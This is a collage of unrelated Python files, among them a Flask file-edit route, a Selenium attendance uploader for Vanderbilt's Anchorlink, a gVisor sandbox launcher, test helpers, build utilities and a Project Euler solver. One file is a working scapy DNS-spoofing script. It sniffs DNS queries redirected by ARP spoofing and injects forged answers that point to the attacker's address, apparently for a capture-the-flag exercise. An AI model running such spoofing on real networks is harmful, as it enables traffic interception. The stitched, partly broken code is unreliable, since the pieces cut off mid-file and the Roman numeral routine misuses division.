mod = vsn.mod
form = EditFileForm()
form.file.validators.append(FileRequired())
if request.method == 'POST':
if form.validate_on_submit():
stored = upload_file(form.file.data, user)
mfile = DraftModFile(
stored = stored,
desc = form.desc.data,
page_url = form.page_url.data,
redirect_url = form.redirect_url.data,
direct_url = form.direct_url.data,
)
vsn.files.append(mfile)
db.session.commit()
return redirect(url_for('edit.draft_page', id=mod.id))
return render_template('editor/edit-file.html', form=form, mod=mod, vsn=vsn)
@edit.route("/draft/edit/mod-file/<id>", methods=['GET', 'POST'])
@login_required(role=roles.archivist, pass_user=True)
def edit_mod_file(user, id):
mfile = DraftModFile.query.filter_by(id=id).first_or_404()
vsn = mfile.version
mod = vsn.mod
form = EditFileForm(
desc=mfile.desc,
page_url=mfile.page_url,
redirect_url=mfile.redirect_url,
direct_url=mfile.direct_url,
)
if request.method == 'POST':
if form.validate_on_submit():
if form.file.data:
stored = upload_file(form.file.data, user)
mfile.stored = stored
mfile.desc = form.desc.data
mfile.page_url = form.page_url.data
mfile.redirect_url = form.redirect_url.data
mfile.direct_url = form.direct_url.data
db.session.commit()
return redirect(url_for('edit.draft_page', id=mod.id))
return render_template('editor/edit-file.html', form=form, mod=mod,
vsn=vsn, editing=mfile, curfile=mfile.stored)
|
from typing import List, Dict, Tuple, Set, NamedTuple
import os
import csv
import warnings
import time
import shutil
import requests
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
class Credentials(NamedTuple):
'''Vanderbilt login pair'''
username: str
password: str
class Event(NamedTuple):
'''https://anchorlink.vanderbilt.edu/actioncenter/organization/ORGANIZATION/events/calendar/details/ID'''
organization: str
id: str
PING_USERNAME_LOCATOR = (By.CSS_SELECTOR, 'input#identifierInput')
PING_PASSWORD_LOCATOR = (By.CSS_SELECTOR, '[name="pf.pass"]')
PING_SIGN_ON_LOCATOR = (By.CSS_SELECTOR, 'a.ping-button')
PING_ERROR_LOCATOR = (By.CSS_SELECTOR, '.ping-error')
PING_NEXT_LOCATOR = PING_SIGN_ON_LOCATOR # same ping button
ANCHORLINK_LOCATOR = (By.CSS_SELECTOR, '[role="main"]')
LOGIN_EVENT_LOCATOR = (By.CSS_SELECTOR, ', '.join([ANCHORLINK_LOCATOR[1], PING_ERROR_LOCATOR[1]]))
RELOG_EVENT_LOCATOR = (By.CSS_SELECTOR, ', '.join([ANCHORLINK_LOCATOR[1], PING_USERNAME_LOCATOR[1]]))
SWIPE_CARD_ACCESS_CODE_FIELD_LOCATOR = (By.CSS_SELECTOR, 'div.form-control')
ACCESS_CODE_LOCATOR = (By.CSS_SELECTOR, '[name="AccessCode"]')
SWIPE_READY_LOCATOR = (By.CSS_SELECTOR, 'div.alert-info')
SWIPE_SUCCESS_LOCATOR = (By.CSS_SELECTOR, 'div.alert-success')
SWIPE_FAILURE_LOCATOR = (By.CSS_SELECTOR, 'div.alert-danger')
SWIPE_DONE_LOCATOR = (By.CSS_SELECTOR, ', '.join([SWIPE_SUCCESS_LOCATOR[1], SWIPE_FAILURE_LOCATOR[1]]))
CARD_DATA_LOCATOR = (By.CSS_SELECTOR, '[name="cardData"]')
EXPORT_COMPLETE_LOCATOR = (By.CSS_SELECTOR, 'div#flash')
MOST_RECENT_DOWNLOAD_BUTTON_LOCATOR = (By.CSS_SELECTOR, 'table > tbody > tr:first-child > td:last-child > a:first-child')
ATTENDANCE_REPORT_SKIP_N_FIRST_LINES = 6
class ReportLine(NamedTuple):
'''From the 5th row of the exported report'''
First_Name: str
Last_Name: str
Campus_Email: str
Preferred_Email: str
Attendance_Status: str
Marked_By: str
Marked_On: str
Comments: str
Card_ID_Number: str
ATTENDANCE_REPORT_FIELD_NAMES = ','.join(list(ReportLine.__annotations__.keys())).replace('_', ' ')
WAIT_TIME: int = 5
class Attendance():
def __init__(self, credentials: Credentials, event: Event, debug: bool = False, driver = None):
self.credentials = credentials
self.event = event
self.debug = debug
self.driver = driver
self.logged_in = False
self.previously_uploaded = set()
self.last_download = None
if self.driver is None:
# Headless mode
opts = webdriver.ChromeOptions()
if not debug:
opts.add_argument('--headless')
opts.add_argument('--disable-gpu')
opts.add_argument('--no-sandbox')
opts.add_argument('--disable-dev-shm-usage')
opts.add_argument('--single-process')
binary_names = ['google-chrome', 'chromium-browser', 'chromium']
for name in binary_names:
binary_location = shutil.which(name)
if binary_location is None:
continue
opts.binary_location = binary_location
break
self.driver = webdriver.Chrome(executable_path='/app/.chromedriver/bin/chromedriver', options=opts)
else:
self.driver = webdriver.Firefox()
# No implicit waiting -- all waits must be EXPLICIT
self.driver.implicitly_wait(0)
def __del__(self):
# Quit doesn't work in __del__ for Chrome
if self.driver is not None:
self.driver.close()
def is_login_valid(self) -> bool:
if not self.logged_in:
return False
self.driver.get("https://anchorlink.vanderbilt.edu/account/login?returnUrl=/")
WebDriverWait(self.driver, WAIT_TIME).until(EC.visibility_of_element_located(RELOG_EVENT_LOCATOR))
self.logged_in = len(self.driver.find_elements(*ANCHORLINK_LOCATOR)) > 0
return self.logged_in
def login(self):
"""Logs in via Vanderbilt Ping SSO or raises an exception if credentials aren't valid"""
if self.is_login_valid():
return
self.driver.get("https://anchorlink.vanderbilt.edu/account/login?returnUrl=/")
WebDriverWait(self.driver, WAIT_TIME).until(EC.visibility_of_element_located(PING_USERNAME_LOCATOR))
self.driver.find_element(*PING_USERNAME_LOCATOR).send_keys(self.credentials.username)
self.driver.find_element(*PING_NEXT_LOCATOR).click()
WebDriverWait(self.driver, WAIT_TIME).until(EC.visibility_of_element_located(PING_PASSWORD_LOCATOR))
self.driver.find_element(*PING_PASSWORD_LOCATOR).send_keys(self.credentials.password)
WebDriverWait(self.driver, WAIT_TIME).until(EC.visibility_of_element_located(PING_SIGN_ON_LOCATOR))
self.driver.find_element(*PING_SIGN_ON_LOCATOR).click()
try:
WebDriverWait(self.driver, WAIT_TIME).until(EC.visibility_of_element_located(LOGIN_EVENT_LOCATOR))
except TimeoutException:
warnings.warn('Could not locate login event occurrence, maybe Anchorlink or Ping changed some elements?', RuntimeWarning)
finally:
if len(self.driver.find_elements(*PING_ERROR_LOCATOR)) > 0:
raise PermissionError(f'Could not log in: "{self.driver.find_element(*PING_ERROR_LOCATOR).text}"')
self.logged_in = True
def raw_upload(self, swiped_card_codes: List[str]) -> List[bool]:
"""Uploads swipe card codes to event attendance and returns an equally-sized list of whether each upload succeeded"""
self.login()
def get_access_code() -> str:
"""Gets access code from track attendance page"""
self.driver.get(f"https://anchorlink.vanderbilt.edu/actioncenter/organization/{self.event.organization}/events/events/trackattendance/{self.event.id}")
WebDriverWait(self.driver, WAIT_TIME).until(EC.visibility_of_element_located(SWIPE_CARD_ACCESS_CODE_FIELD_LOCATOR))
form_control = self.driver.find_element(*SWIPE_CARD_ACCESS_CODE_FIELD_LOCATOR)
return form_control.text
access_code = get_access_code()
if access_code is None:
return [False] * len(swiped_card_codes)
self.driver.get("https://anchorlink.vanderbilt.edu/swipe")
access_code_element = self.driver.find_element(*ACCESS_CODE_LOCATOR)
access_code_element.send_keys(access_code)
access_code_element.submit()
WebDriverWait(self.driver, WAIT_TIME).until(EC.visibility_of_element_located(SWIPE_READY_LOCATOR))
def submit_card(code: str) -> bool:
card_data_element = self.driver.find_element(*CARD_DATA_LOCATOR)
card_data_element.send_keys(code)
card_data_element.submit()
WebDriverWait(self.driver, WAIT_TIME).until(EC.visibility_of_any_elements_located(SWIPE_DONE_LOCATOR))
if len(self.driver.find_elements(*SWIPE_SUCCESS_LOCATOR)) > 0:
return True
if len(self.driver.find_elements(*SWIPE_FAILURE_LOCATOR)) > 0:
return False
warnings.warn("Could not find swipe success or failure element, assuming success", RuntimeWarning)
return True
# Invalidate last download
self.last_download = None
return list(map(submit_card, swiped_card_codes))
def download(self) -> List[ReportLine]:
"""Exports and downloads attendance report. Caches card codes to avoid duplicate uploads."""
if self.last_download is not None:
return self.last_download
self.login()
# Export attendance
self.driver.get(f"https://anchorlink.vanderbilt.edu/actioncenter/organization/{self.event.organization}/events/events/exporteventattendance?eventId={self.event.id}")
WebDriverWait(self.driver, WAIT_TIME).until(EC.visibility_of_element_located(EXPORT_COMPLETE_LOCATOR))
# Get download URL from user's My Downloads page. Assumes that the newest report is the correct one.
self.driver.get("https://anchorlink.vanderbilt.edu/actioncenter/downloads")
WebDriverWait(self.driver, WAIT_TIME).until(EC.visibility_of_element_located(MOST_RECENT_DOWNLOAD_BUTTON_LOCATOR))
# First table, table body, first row, last column, first link
download_url = self.driver.find_element(*MOST_RECENT_DOWNLOAD_BUTTON_LOCATOR)
# requests is used here because clicking the link in Selenium would trigger a browser download
session = requests.Session()
for c in self.driver.get_cookies():
session.cookies.set(c['name'], c['value'])
download = session.get(download_url.get_attribute('href'))
# Parse download as UTF-8 CSV skipping the first 5 lines
download_lines = download.content.decode('utf-8').splitlines()
if download_lines[ATTENDANCE_REPORT_SKIP_N_FIRST_LINES-1] != ATTENDANCE_REPORT_FIELD_NAMES:
warnings.warn(f"Report fields do not match: {download_lines[ATTENDANCE_REPORT_SKIP_N_FIRST_LINES-1]} != {ATTENDANCE_REPORT_FIELD_NAMES}", RuntimeWarning)
reader = csv.reader(download_lines[ATTENDANCE_REPORT_SKIP_N_FIRST_LINES:])
report = list(map(lambda line: ReportLine(*line), reader))
for line in report:
self.previously_uploaded.add(line.Card_ID_Number)
self.last_download = report
return report
def upload(self, swiped_card_codes: List[str]) -> List[bool]:
"""Uploads swipe card codes to event attendance and returns an equally-sized list of whether each upload succeeded. Checks last download and previous upload success to avoid duplicate uploads."""
filtered_swipe_card_codes = []
filtered_swipe_card_codes_indices = []
for i, code in enumerate(swiped_card_codes):
# Upload new codes and unique only
if code not in self.previously_uploaded and code not in swiped_card_codes[:i]:
filtered_swipe_card_codes.append(code)
filtered_swipe_card_codes_indices.append(i)
successes = [True] * len(swiped_card_codes)
if len(filtered_swipe_card_codes) == 0:
return successes
uploaded_successes = self.raw_upload(filtered_swipe_card_codes)
for i, code, succ in zip(filtered_swipe_card_codes_indices, filtered_swipe_card_codes, uploaded_successes):
if not succ:
# Because they were uploaded uniquely, there might be some missed failures
for j, other_code in enumerate(swiped_card_codes[i:]):
if other_code == code:
successes[j] = False
else:
self.previously_uploaded.add(code)
return successes
if __name__ == '__main__':
attendance = Attendance(Credentials('puris', os.environ['VANDERBILT_PASSWORD']), Event('designstudio', '5048888'), debug=True)
# These are not real card numbers
print(attendance.upload(['796000210', '796000210', '796000210']))
print(attendance.download())
|
#!/usr/bin/env python3
# Run a command under gvisor, setting environment variables and sharing certain
# directories in read only mode. Specialized for running python, and (for testing)
# bash. Does not change directory structure, for unprivileged operation.
# Contains plenty of hard-coded paths that assume we are running within
# a container.
import argparse
import glob
import json
import os
import subprocess
import sys
import tempfile
# Separate arguments before and after a -- divider.
from itertools import groupby
all_args = sys.argv[1:]
all_args = [list(group) for k, group in groupby(all_args, lambda x: x == "--") if not k]
main_args = all_args[0] # args before the -- divider, for this script.
more_args = all_args[1] if len(all_args) > 1 else [] # args after the -- divider
# to pass on to python/bash.
# Set up options.
parser = argparse.ArgumentParser(description='Run something in gvisor (runsc).')
parser.add_argument('command', choices=['bash', 'python2', 'python3'])
parser.add_argument('--dry-run', '-d', action='store_true',
help="print config")
parser.add_argument('--env', '-E', action='append')
parser.add_argument('--mount', '-m', action='append')
parser.add_argument('--restore', '-r')
parser.add_argument('--checkpoint', '-c')
parser.add_argument('--start', '-s') # allow overridding the entrypoint
parser.add_argument('--faketime')
# If CHECK_FOR_TERMINAL is set, just determine whether we will be running bash, and
# exit with success if so. This is so if we are being wrapped in docker, it can be
# started in interactive mode.
if os.environ.get('CHECK_FOR_TERMINAL') == '1':
args = parser.parse_args(main_args)
exit(0 if args.command == 'bash' else -1)
args = parser.parse_args(main_args)
include_bash = args.command == 'bash'
include_python2 = args.command == 'python2'
include_python3 = args.command == 'python3'
# Basic settings for gvisor's runsc. This follows the standard OCI specification:
# https://github.com/opencontainers/runtime-spec/blob/master/config.md
cmd_args = []
mounts = [ # These will be filled in more fully programmatically below.
{
"destination": "/proc", # gvisor virtualizes /proc
"source": "/proc",
"type": "/procfs"
},
{
"destination": "/sys", # gvisor virtualizes /sys
"source": "/sys",
"type": "/sysfs",
"options": [
"nosuid",
"noexec",
"nodev",
"ro"
]
}
]
preserved = set()
env = [
"PATH=/usr/local/bin:/usr/bin:/bin",
"LD_LIBRARY_PATH=/usr/local/lib" # Assumes python version in /usr/local
] + (args.env or [])
settings = {
"ociVersion": "1.0.0",
"process": {
"terminal": include_bash,
"user": {
"uid": os.getuid(), # match current user id, for convenience with mounts
"gid": 0
},
"args": cmd_args,
"env": env,
"cwd": "/",
},
"root": {
"path": "/", # The fork of gvisor we use shares paths with host.
"readonly": True # Read-only access by default, and we will blank out most
# of the host with empty "tmpfs" mounts.
},
"hostname": "gristland",
"mounts": mounts,
"linux": {
"namespaces": [
{
"type": "pid"
},
{
"type": "network"
},
{
"type": "ipc"
},
{
"type": "uts"
},
{
"type": "mount"
}
]
}
}
# Helper for preparing a mount.
def preserve(*locations, short_failure=False):
for location in locations:
# Check the requested directory is visible on the host, and that there hasn't been a
# muddle. For Grist, this could happen if a parent directory of a temporary import
# directory hasn't been made available to the container this code runs in, for example.
if not os.path.exists(location):
if short_failure:
raise Exception('cannot find: ' + location)
raise Exception('cannot find: ' + location + ' ' +
'(if tmp path, make sure TMPDIR when running grist and GRIST_TMP line up)')
mounts.append({
"destination": location,
"source": location,
"options": ["ro"],
"type": "bind"
})
preserved.add(location)
# Prepare the file system - blank out everything that need not be shared.
exceptions = ["lib", "lib64"] # to be shared (read-only)
exceptions += ["proc", "sys"] # already virtualized
# retain /bin and /usr/bin for utilities
start = args.start
if include_bash or start:
exceptions.append("bin")
preserve("/usr/bin")
preserve("/usr/local/lib")
if os.path.exists('/lib64'):
preserve("/lib64")
if os.path.exists('/usr/lib64'):
preserve("/usr/lib64")
preserve("/usr/lib")
# include python3 for bash and python3
best = None
if not include_python2:
# We expect python3 in /usr/bin or /usr/local/bin.
candidates = [
path
# Pick the most generic python if not matching python3.9.
# Sorry this is delicate because of restores, mounts, symlinks.
for pattern in ['python3.9', 'python3', 'python3*']
for root in ['/usr/local', '/usr']
for path in glob.glob(f'{root}/bin/{pattern}')
if os.path.exists(path)
]
if not candidates:
raise Exception('could not find python3')
best = os.path.realpath(candidates[0])
preserve(best)
# include python2 for bash and python2
if not include_python3:
# Try to include python2 only if it is present or we were specifically asked for it.
# This is to facilitate testing on a python3-only container.
if os.path.exists("/usr/bin/python2.7") or include_python2:
preserve("/usr/bin/python2.7", short_failure=True)
best = "/usr/bin/python2.7"
preserve("/usr/lib")
# Set up any specific shares requested.
if args.mount:
preserve(*args.mount)
for directory in os.listdir('/'):
if directory not in exceptions and ("/" + directory) not in preserved:
mounts.insert(0, {
"destination": "/" + directory,
"type": "tmpfs" # This places an empty directory at this destination.
})
# Set up faketime inside the sandbox if requested. Can't be set up outside the sandbox,
# because gvisor is written in Go and doesn't use the standard library that faketime
# tweaks.
if args.faketime:
preserve('/usr/lib/x86_64-linux-gnu/faketime')
cmd_args.append('faketime')
cmd_args.append('-f')
cmd_args.append('2020-01-01 00:00:00' if args.faketime == 'default' else args.faketime)
preserve('/usr/bin/faketime')
preserve('/bin/date')
# Pick and set an initial entry point (bash or python).
if start:
cmd_args.append(start)
else:
cmd_args.append('bash' if include_bash else best)
# Add any requested arguments for the program that will be run.
cmd_args += more_args
# Helper for assembling a runsc command.
# Takes the directory to work in and a list of arguments to append.
def make_command(root_dir, action):
flag_string = os.environ.get('GVISOR_FLAGS') or '-rootless'
flags = flag_string.split(' ')
command = ["runsc",
"-root", "/tmp/runsc", # Place container information somewhere writable.
] + flags + [
"-network",
"none"] + action + [
root_dir.replace('/', '_')] # Derive an arbitrary container name.
return command
# Generate the OCI spec as config.json in a temporary directory, and either show
# it (if --dry-run) or pass it on to gvisor runsc.
with tempfile.TemporaryDirectory() as root: # pylint: disable=no-member
config_filename = os.path.join(root, 'config.json')
with open(config_filename, 'w') as fout:
json.dump(settings, fout, indent=2)
if args.dry_run:
with open(config_filename, 'r') as fin:
spec = json.load(fin)
print(json.dumps(spec, indent=2))
else:
if not args.checkpoint:
if args.restore:
command = make_command(root, ["restore", "--image-path=" + args.restore])
else:
command = make_command(root, ["run"])
result = subprocess.run(command, cwd=root) # pylint: disable=no-member
if result.returncode != 0:
raise Exception('gvisor runsc problem: ' + json.dumps(command))
else:
# We've been asked to make a checkpoint.
# Start up the sandbox, and wait for it to emit a message on stderr ('Ready').
command = make_command(root, ["run"])
process = subprocess.Popen(command, cwd=root, stderr=subprocess.PIPE)
ready_line = process.stderr.readline() # wait for ready
sys.stderr.write('Ready message: ' + ready_line.decode('utf-8'))
sys.stderr.flush()
# Remove existing checkpoint if present.
if os.path.exists(os.path.join(args.checkpoint, 'checkpoint.img')):
os.remove(os.path.join(args.checkpoint, 'checkpoint.img'))
# Make the directory, so we will later have the right to delete the checkpoint if
# we wish to replace it. Otherwise there is a muddle around permissions.
if not os.path.exists(args.checkpoint):
os.makedirs(args.checkpoint)
# Go ahead and run the runsc checkpoint command.
# This is destructive, it will kill the sandbox we are checkpointing.
command = make_command(root, ["checkpoint", "--image-path=" + args.checkpoint])
result = subprocess.run(command, cwd=root) # pylint: disable=no-member
if result.returncode != 0:
raise Exception('gvisor runsc checkpointing problem: ' + json.dumps(command))
# We are done!
|
#
# Copyright (c) 2019 UAVCAN Development Team
# This software is distributed under the terms of the MIT License.
# Author: Pavel Kirienko <pavel.kirienko@zubax.com>
#
import sys
import typing
import dataclasses
@dataclasses.dataclass(frozen=True)
class TransportConfig:
cli_args: typing.Sequence[str]
can_transmit: bool
TransportFactory = typing.Callable[[typing.Optional[int]], TransportConfig]
"""
This factory constructs arguments for the CLI instructing it to use a particular transport configuration.
The factory takes one argument - the node-ID - which can be None (anonymous).
"""
def _make_transport_factories_for_cli() -> typing.Iterable[TransportFactory]:
"""
Sensible transport configurations supported by the CLI to test against.
Don't forget to extend when adding support for new transports.
"""
if sys.platform == 'linux':
# CAN via SocketCAN
yield lambda nid: TransportConfig(
cli_args=(f'--tr=CAN(can.media.socketcan.SocketCANMedia("vcan0",64),local_node_id={nid})', ),
can_transmit=True,
)
# Redundant CAN via SocketCAN
yield lambda nid: TransportConfig(
cli_args=(
f'--tr=CAN(can.media.socketcan.SocketCANMedia("vcan0",8),local_node_id={nid})',
f'--tr=CAN(can.media.socketcan.SocketCANMedia("vcan1",32),local_node_id={nid})',
f'--tr=CAN(can.media.socketcan.SocketCANMedia("vcan2",64),local_node_id={nid})',
),
can_transmit=True,
)
# Serial via TCP/IP tunnel (emulation)
from tests.transport.serial import VIRTUAL_BUS_URI
yield lambda nid: TransportConfig(
cli_args=(f'--tr=Serial("{VIRTUAL_BUS_URI}",local_node_id={nid})', ),
can_transmit=True,
)
# UDP/IP on localhost (cannot transmit if anonymous)
yield lambda nid: TransportConfig(
cli_args=(f'--tr=UDP("127.0.0.{nid}/8")', ),
can_transmit=True,
) if nid is not None else TransportConfig(
cli_args=('--tr=UDP("127.255.255.255/8")', ),
can_transmit=False,
)
# Redundant UDP+Serial. The UDP transport does not support anonymous transfers.
yield lambda nid: TransportConfig(
cli_args=(
f'--tr=Serial("{VIRTUAL_BUS_URI}",local_node_id={nid})',
(f'--tr=UDP("127.0.0.{nid}/8")' if nid is not None else '--tr=UDP("127.255.255.255/8")'),
),
can_transmit=nid is not None,
)
TRANSPORT_FACTORIES = list(_make_transport_factories_for_cli())
|
from math import cos, sin
from typing import List
import bot.injector as injector
from bot.hooks import hookable
from sc2 import BotAI
from sc2.pixel_map import PixelMap
from sc2.position import Point2
from sc2.unit import Unit
from sc2.units import Units
class UnitObservation:
def __init__(self, unit: Unit, time_to_live: int, permanent = False):
self.bot: BotAI = injector.inject(BotAI)
self.unit = unit
self.time_to_live = time_to_live
self.permanent = permanent
self.last_update = 0
def iterate(self, time):
# update unit position
if self.last_update > 0 and self.unit.movement_speed > 0:
movement_amount = self.unit.movement_speed * (time - self.last_update)
direction = Point2((cos(self.unit.facing), sin(self.unit.facing)))
new_position = self.unit.position + movement_amount * direction
a: PixelMap = self.bot._game_info.pathing_grid
if (
new_position.x > 0 and new_position.x < a.width - 1 and
new_position.y > 0 and new_position.y < a.height - 1 and
(self.unit.is_flying or self.bot.in_pathing_grid(new_position))
):
# self.unit.set_position(new_position)
pass
self.last_update = time
if self.permanent:
return True
self.time_to_live = self.time_to_live - 1
if self.time_to_live == 0:
return False
return True
def update_ttl(self, time_to_live: int):
self.time_to_live = time_to_live
def update_unit(self, unit: Unit):
self.unit = unit
@hookable
class UnitMemory:
def __init__(self, bot):
self.bot: BotAI = bot
self.unit_observations: List[UnitObservation] = []
self.observed_enemy_units: Units =Units([])
def iterate(self, time):
# Update unit observations based on known enemy units
ttl = 240
for unit in self.bot.known_enemy_units:
updated = False
for observation in self.unit_observations:
if observation.unit.tag == unit.tag:
observation.update_unit(unit)
observation.update_ttl(ttl)
updated = True
if not updated and unit.is_visible:
if unit.is_structure:
self.unit_observations.append(UnitObservation(unit, ttl, True))
else:
self.unit_observations.append(UnitObservation(unit, ttl))
# Update observed_enemy_units then remove old observations
temp: Units =Units([])
to_remove = []
for observation in self.unit_observations:
temp.append(observation.unit)
if not observation.iterate(time):
# forget unit if observation has expired or there's a friendly unit in vision range but the enemy unit can't be seen
to_remove.append(observation)
elif not self.bot.known_enemy_units.find_by_tag(observation.unit.tag) and self.bot.is_visible(observation.unit.position):
# observation.unit.set_position(self.bot.enemy_start_locations[0])
pass
for observation in to_remove:
self.unit_observations.remove(observation)
self.observed_enemy_units: Units = Units(temp)
def on_unit_destroyed(self, tag: str):
to_remove = []
for observation in self.unit_observations:
observation: UnitObservation
if observation.unit.tag == tag:
to_remove.append(observation)
for observation in to_remove:
self.unit_observations.remove(observation)
|
import os
import setuptools
import versioneer
LOCAL_DIR = os.path.dirname(os.path.abspath(__file__))
def read_requirements(path="requirements.txt"):
"""Read requirements file relative to setup.py"""
full_path = os.path.join(LOCAL_DIR, path)
if not os.path.exists(full_path):
return []
def yield_line(path):
with open(path) as fid:
yield from fid.readlines()
return [
requirement.strip()
for requirement in yield_line(full_path)
if not requirement.startswith("#")
]
requirements = read_requirements()
print(requirements)
# test_requirements = read_requirements(path="requirements_test.txt")
setuptools.setup(
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
name="UMich Controls - Python",
description="GCode",
license="BSD",
packages=setuptools.find_packages(),
zip_safe=False,
install_requires=[],
include_package_data=True,
)
|
import torch
from xallennlp.modules.span_extractors import PoolingSpanExtractor
def test_pooling_span_extractor() -> None:
inputs = torch.rand((2, 4, 5))
spans = torch.LongTensor([[[0, 2], [1, 1]], [[1, 2], [2, 3]]])
extractor = PoolingSpanExtractor(input_dim=5)
output = extractor(inputs, spans)
assert output.size() == (2, 2, 5)
inputs = torch.rand((2, 4, 5))
spans = torch.LongTensor([[[0, 2], [1, 1]], [[1, 2], [2, 3]]])
extractor = PoolingSpanExtractor(input_dim=5, num_width_embeddings=4, span_width_embedding_dim=3)
output = extractor(inputs, spans)
assert output.size() == (2, 2, 5 + 3)
|
# xpyBuild - eXtensible Python-based Build System
#
# This module holds definitions that are used throughout the build system, and
# typically all names from this module will be imported.
#
# Copyright (c) 2019 Software AG, Darmstadt, Germany and/or its licensors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# $Id: buildcommon.py 301527 2017-02-06 15:31:43Z matj $
#
""" Utility functions for manipulating strings, such as
`xpybuild.utils.stringutils.compareVersions`.
"""
import traceback, os, sys, io
import re
import platform
import logging
def compareVersions(v1: str, v2: str) -> int:
""" Compares two alphanumeric dotted version strings to see which is more recent.
Example usage::
if compareVersions(thisversion, '1.2.alpha-3') > 0:
... # thisversion is newer than 1.2.alpha-3
The comparison algorithm ignores case, and normalizes separators ./-/_
so that `'1.alpha2'=='1Alpha2'`. Any string components are compared
lexicographically with other strings, and compared to numbers
strings are always considered greater.
@param v1: A string containing a version number, with any number of components.
@param v2: A string containing a version number, with any number of components.
@return: an integer > 0 if v1>v2,
an integer < 0 if v1<v2,
or 0 if they are semantically the same.
>>> compareVersions('10-alpha5.dev10', '10alpha-5-dEv_10') == 0 # normalization of case and separators
True
>>> compareVersions('1.2.0', '1.2')
0
>>> compareVersions('1.02', '1.2')
0
>>> compareVersions('1.2.3', '1.2') > 0
True
>>> compareVersions('1.2', '1.2.3')
-1
>>> compareVersions('10.2', '1.2')
1
>>> compareVersions('1.2.text', '1.2.0') # letters are > numbers
1
>>> compareVersions('1.2.text', '1.2') # letters are > numbers
1
>>> compareVersions('10.2alpha1', '10.2alpha')
1
>>> compareVersions('10.2dev', '10.2alpha') # letters are compared lexicographically
1
>>> compareVersions('', '')
0
>>> compareVersions('1', '')
1
"""
def normversion(v):
# normalize versions into a list of components, with integers for the numeric bits
v = [int(x) if x.isdigit() else x for x in re.split('([0-9]+|[.])', v.lower().replace('-','.').replace('_','.')) if (x and x != '.') ]
return v
v1 = normversion(v1)
v2 = normversion(v2)
# make them the same length
while len(v1)<len(v2): v1.append(0)
while len(v1)>len(v2): v2.append(0)
for i in range(len(v1)):
if type(v1[i]) != type(v2[i]): # can't use > on different types
if type(v2[i])==int: # define string>int
return +1
else:
return -1
else:
if v1[i] > v2[i]: return 1
if v1[i] < v2[i]: return -1
return 0
def formatTimePeriod(secs):
"""
Format a time period to a short display string.
"""
if secs >= 120:
return '%0.1f minutes'%(secs/60.0)
elif secs >= 10:
return '%d seconds'%(secs)
else:
return '%0.1f seconds'%(secs)
|
#!/usr/bin/python3
from scapy.all import *
import netifaces as ni
import uuid
import datetime
import time
# Our eth0 IP
ipaddr = ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']
# Our Mac Addr
macaddr = ':'.join(['{:02x}'.format((uuid.getnode() >> i) & 0xff) for i in range(0,8*6,8)][::-1])
# destination ip we arp spoofed
ipaddr_we_arp_spoofed = "10.6.6.53" ## see arp-resp.py
def handle_dns_request(packet):
# Need to change mac addresses, Ip Addresses, and ports below.
# We also need
req_udp = packet[UDP]
eth = Ether(src=macaddr, dst="4c:24:57:ab:ed:84") # need to replace mac addresses
ip = IP(dst="10.6.6.35", src=ipaddr_we_arp_spoofed) # need to replace IP addresses
udp = UDP(dport=req_udp.sport, sport=53)
req_dns = packet[DNS] # need to replace ports
dns = DNS(
qr = 1,
rd=1,
id=req_dns.id,
qd=req_dns.qd,
an = DNSRR(rrname = req_dns.qd.qname, ttl = 5, rdata = str(ipaddr))
)
# dns_response = eth / ip / udp / dns # eth wrapping is not needed at DNS level
dns_response = ip / udp / dns # without the DNS wrapping
dns_response.show()
send(dns_response)
# def pranshu_dns_request(packet):
# time = datetime.datetime.now()
# if packet.haslayer(UDP):
# print(packet.src)
# print(packet[DNS])
# print(packet[DNS].id)
# print(packet[DNS].qr)
# print(packet[DNS].rd)
# print(packet[DNS].rcode)
# print(packet[DNSQR].qname)
# def read_packet():
# packets = rdpcap("../pcaps/dns.pcap")
# for packet in packets:
# print(packet.show())
def main():
berkeley_packet_filter = " and ".join( [
"udp dst port 53", # dns
"udp[10] & 0x80 = 0", # dns request
"dst host {}".format(ipaddr_we_arp_spoofed), # destination ip we had spoofed (not our real ip)
"ether dst host {}".format(macaddr) # our macaddress since we spoofed the ip to our mac
] )
pranshu_packet_filter = "udp dst port 53" # my filter is a lot less rigid
# sniff the eth0 int without storing packets in memory and stopping after one dns request
sniff(filter=pranshu_packet_filter, prn=handle_dns_request, store=0, iface="eth0")
# sniff(filter=pranshu_packet_filter, prn=pranshu_dns_request, store=0, iface="eth0", count=1)
if __name__ == "__main__":
main() |
# coding=utf-8
"""
Problem 89
18 February 2005
For a number written in Roman numerals to be considered valid there are basic rules which must be followed.
Even though the rules allow some numbers to be expressed in more than one way there is always a "best" way
of writing a particular number.
For example, it would appear that there are at least six ways of writing the number sixteen:
IIIIIIIIIIIIIIII
VIIIIIIIIIII
VVIIIIII
XIIIIII
VVVI
XVI
However, according to the rules only XIIIIII and XVI are valid, and the last example is considered to be the most
efficient, as it uses the least number of numerals.
The 11K text file, roman.txt (right click and 'Save Link/Target As...'), contains one thousand numbers written in
valid, but not necessarily minimal, Roman numerals; see About... Roman Numerals for the definitive rules for
this problem.
Find the number of characters saved by writing each of these in their minimal form.
Note: You can assume that all the Roman numerals in the file contain no more than four consecutive identical units.
----------------------------------------------------------
Created on 10.02.2015
@author: ahallmann
"""
import unittest
import timeit
mapping = {
'I': 1,
'V': 5,
'X': 10,
'L': 50,
'C': 100,
'D': 500,
'M': 1000
}
order = ['M', 'D', 'C', 'L', 'X', 'V', 'I']
def read_numerals(filename):
f = open(filename, 'r')
numerals = []
for line in f.readlines():
numerals.append(line.strip())
f.close()
return numerals
def format_roman_numeral(n):
global mapping, order
sub_numerals = {'I': 10, 'X': 100, 'C': 1000}
s = ''
number_index = 0
while number_index < len(order):
numeral_char = order[number_index]
numeral_value = mapping[numeral_char]
for sub_char in sub_numerals:
sub_value = mapping[sub_char]
if 1 <= numeral_value - sub_value <= n < numeral_value <= sub_numerals[sub_char]:
s += sub_char
n += sub_value
if n >= numeral_value:
s += numeral_char * (n / numeral_value)
n %= numeral_value
if n <= 0:
break
number_index -= 1
number_index += 1
return s
